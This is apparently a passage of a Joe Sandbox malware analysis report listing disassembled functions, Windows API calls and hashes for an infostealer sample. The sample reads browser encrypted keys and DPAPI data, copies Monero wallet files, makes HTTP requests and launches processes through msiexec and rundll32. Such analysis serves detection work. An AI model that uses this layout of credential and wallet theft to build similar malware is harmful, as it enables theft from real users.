                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: fa2f7c491e836ffa03b321dca4939e5102b2c3a10a2cb7c6d0d10a73c0b6426c
                        • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                        • Opcode Fuzzy Hash: fa2f7c491e836ffa03b321dca4939e5102b2c3a10a2cb7c6d0d10a73c0b6426c
                        • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                        APIs
                        • memset.MSVCRT ref: 0041429E
                        • memset.MSVCRT ref: 004142B5
                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                        • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                        • lstrcatA.KERNEL32(?,024DCB38), ref: 0041430B
                        • lstrcatA.KERNEL32(?,?), ref: 0041431F
                        • lstrcatA.KERNEL32(?,024DC820), ref: 00414333
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                          • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                          • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                          • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                        • StrStrA.SHLWAPI(?,024DDFF0), ref: 004143F3
                        • GlobalFree.KERNEL32(?), ref: 00414512
                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                        • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                        • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                        • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 1191620704-0
                        • Opcode ID: 35dc9abe077a93c729557fad744a15183afba98a1ba7520b66c4d280a3250323
                        • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                        • Opcode Fuzzy Hash: 35dc9abe077a93c729557fad744a15183afba98a1ba7520b66c4d280a3250323
                        • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                        APIs
                        • memset.MSVCRT ref: 040B4505
                        • memset.MSVCRT ref: 040B451C
                          • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                        • lstrcat.KERNEL32(?,00000000), ref: 040B4553
                        • lstrcat.KERNEL32(?,0064A30C), ref: 040B4572
                        • lstrcat.KERNEL32(?,?), ref: 040B4586
                        • lstrcat.KERNEL32(?,0064A5D8), ref: 040B459A
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040B8FF7: GetFileAttributesA.KERNEL32(00000000,?,040A1DBB,?,?,00425654,?,?,00420E1F), ref: 040B9006
                          • Part of subcall function 040A9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 040A9FA0
                          • Part of subcall function 040A9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 040A9FF9
                          • Part of subcall function 040A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 040A9C53
                          • Part of subcall function 040A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 040A9C78
                          • Part of subcall function 040A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 040A9C98
                          • Part of subcall function 040A9C27: ReadFile.KERNEL32(000000FF,?,00000000,040A16F6,00000000), ref: 040A9CC1
                          • Part of subcall function 040A9C27: LocalFree.KERNEL32(040A16F6), ref: 040A9CF7
                          • Part of subcall function 040A9C27: CloseHandle.KERNEL32(000000FF), ref: 040A9D01
                          • Part of subcall function 040B9627: GlobalAlloc.KERNEL32(00000000,040B4644,040B4644), ref: 040B963A
                        • StrStrA.SHLWAPI(?,0064A0D8), ref: 040B465A
                        • GlobalFree.KERNEL32(?), ref: 040B4779
                          • Part of subcall function 040A9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,040A5155,00000000,00000000), ref: 040A9D56
                          • Part of subcall function 040A9D27: LocalAlloc.KERNEL32(00000040,?,?,?,040A5155,00000000,?), ref: 040A9D68
                          • Part of subcall function 040A9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,040A5155,00000000,00000000), ref: 040A9D91
                          • Part of subcall function 040A9D27: LocalFree.KERNEL32(?,?,?,?,040A5155,00000000,?), ref: 040A9DA6
                          • Part of subcall function 040AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 040AA094
                        • lstrcat.KERNEL32(?,00000000), ref: 040B470A
                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 040B4727
                        • lstrcat.KERNEL32(00000000,00000000), ref: 040B4739
                        • lstrcat.KERNEL32(00000000,?), ref: 040B474C
                        • lstrcat.KERNEL32(00000000,00420FB8), ref: 040B475B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 1191620704-0
                        • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                        • Instruction ID: a068f4b7a22d437a125a5e5fe81f3d781979cebf948d4579297844b040241142
                        • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                        • Instruction Fuzzy Hash: 267164B6A00218BBDB14FBF0DC45FEE73B9AF48304F008598E645A6180DA75EB55CF95
                        APIs
                        • memset.MSVCRT ref: 00401327
                          • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                          • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                          • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                          • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                          • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                        • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                        • lstrlenA.KERNEL32(?), ref: 0040135C
                        • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024A8A30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                        • memset.MSVCRT ref: 00401516
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 1930502592-218353709
                        • Opcode ID: 2b826a0f646ba4068e1c47d902010c813df356d60d5a4c6e57d199a22263e09a
                        • Instruction ID: 456b5fac361f61c5265e43a16bd15ab14158e39c7f71a6669150f14a30e0c61c
                        • Opcode Fuzzy Hash: 2b826a0f646ba4068e1c47d902010c813df356d60d5a4c6e57d199a22263e09a
                        • Instruction Fuzzy Hash: 565164B1D5011897CB15FB61DD91BED733CAF54304F4041ADB60A62092EE385BD9CBAA
                        APIs
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,024D9A00), ref: 00406303
                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,024DDF00,00000000,00000000,00400100,00000000), ref: 00406385
                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                        • lstrlenA.KERNEL32(00000000), ref: 0041532F
                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                        • lstrlenA.KERNEL32(00000000), ref: 00415383
                        • strtok.MSVCRT(00000000,?), ref: 0041539E
                        • lstrlenA.KERNEL32(00000000), ref: 004153AE
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3532888709-1526165396
                        • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                        • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                        • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                        • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                        APIs
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                        • StrCmpCA.SHLWAPI(?,024D9A00), ref: 00406147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                        • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                        • InternetCloseHandle.WININET(a+A), ref: 00406253
                        • InternetCloseHandle.WININET(00000000), ref: 00406260
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID: a+A$a+A
                        • API String ID: 4287319946-2847607090
                        • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                        • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                        • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                        • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • memset.MSVCRT ref: 040B0E83
                        • lstrcat.KERNEL32(?,00000000), ref: 040B0E9C
                        • lstrcat.KERNEL32(?,00420D7C), ref: 040B0EAE
                        • lstrcat.KERNEL32(?,00000000), ref: 040B0EC4
                        • lstrcat.KERNEL32(?,00420D80), ref: 040B0ED6
                        • lstrcat.KERNEL32(?,00000000), ref: 040B0EEF
                        • lstrcat.KERNEL32(?,00420D84), ref: 040B0F01
                        • lstrlen.KERNEL32(?), ref: 040B0F0E
                        • memset.MSVCRT ref: 040B0F34
                        • memset.MSVCRT ref: 040B0F48
                          • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                          • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                          • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040B9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,040B0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 040B9948
                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 040B0FC1
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 040B0FCD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                        • String ID:
                        • API String ID: 1395395982-0
                        • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                        • Instruction ID: 8b250215d151303b35db52350da2266e2793440c281466e31ccc09d8ffc54540
                        • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                        • Instruction Fuzzy Hash: ED8170B5610218ABDB14EBA0DD51FEE7379AF4420CF404199A34676091EF747B88CFAD
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • memset.MSVCRT ref: 040B0E83
                        • lstrcat.KERNEL32(?,00000000), ref: 040B0E9C
                        • lstrcat.KERNEL32(?,00420D7C), ref: 040B0EAE
                        • lstrcat.KERNEL32(?,00000000), ref: 040B0EC4
                        • lstrcat.KERNEL32(?,00420D80), ref: 040B0ED6
                        • lstrcat.KERNEL32(?,00000000), ref: 040B0EEF
                        • lstrcat.KERNEL32(?,00420D84), ref: 040B0F01
                        • lstrlen.KERNEL32(?), ref: 040B0F0E
                        • memset.MSVCRT ref: 040B0F34
                        • memset.MSVCRT ref: 040B0F48
                          • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                          • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                          • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040B9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,040B0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 040B9948
                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 040B0FC1
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 040B0FCD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                        • String ID:
                        • API String ID: 1395395982-0
                        • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                        • Instruction ID: 5565df0a60d927569ca8db978aaecda62d55b25ab0ff58ba0b578a22d2ae54fd
                        • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                        • Instruction Fuzzy Hash: 49618FB5610218ABDB24EBA0DD45FEE7738AF4430CF404199A74676091EB747B88CFAD
                        APIs
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                          • Part of subcall function 040A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                          • Part of subcall function 040A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 040A4B7C
                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 040A4BA1
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040A4D21
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 040A504F
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 040A506B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 040A507F
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 040A50B0
                        • InternetCloseHandle.WININET(00000000), ref: 040A5114
                        • InternetCloseHandle.WININET(00000000), ref: 040A512C
                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 040A4D7C
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                        • InternetCloseHandle.WININET(00000000), ref: 040A5136
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID:
                        • API String ID: 2402878923-0
                        • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                        • Instruction ID: ad987374b5055c592662f49d3f080e080717921be529aceb2b6d0998f48fed2d
                        • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                        • Instruction Fuzzy Hash: 58123F72A10218ABEB15EB94DD90FEEB379BF14308F504199A14672091EF743F88CFA5
                        APIs
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                          • Part of subcall function 040A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                          • Part of subcall function 040A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 040A6548
                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 040A656A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040A659C
                        • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 040A65EC
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 040A6626
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 040A6638
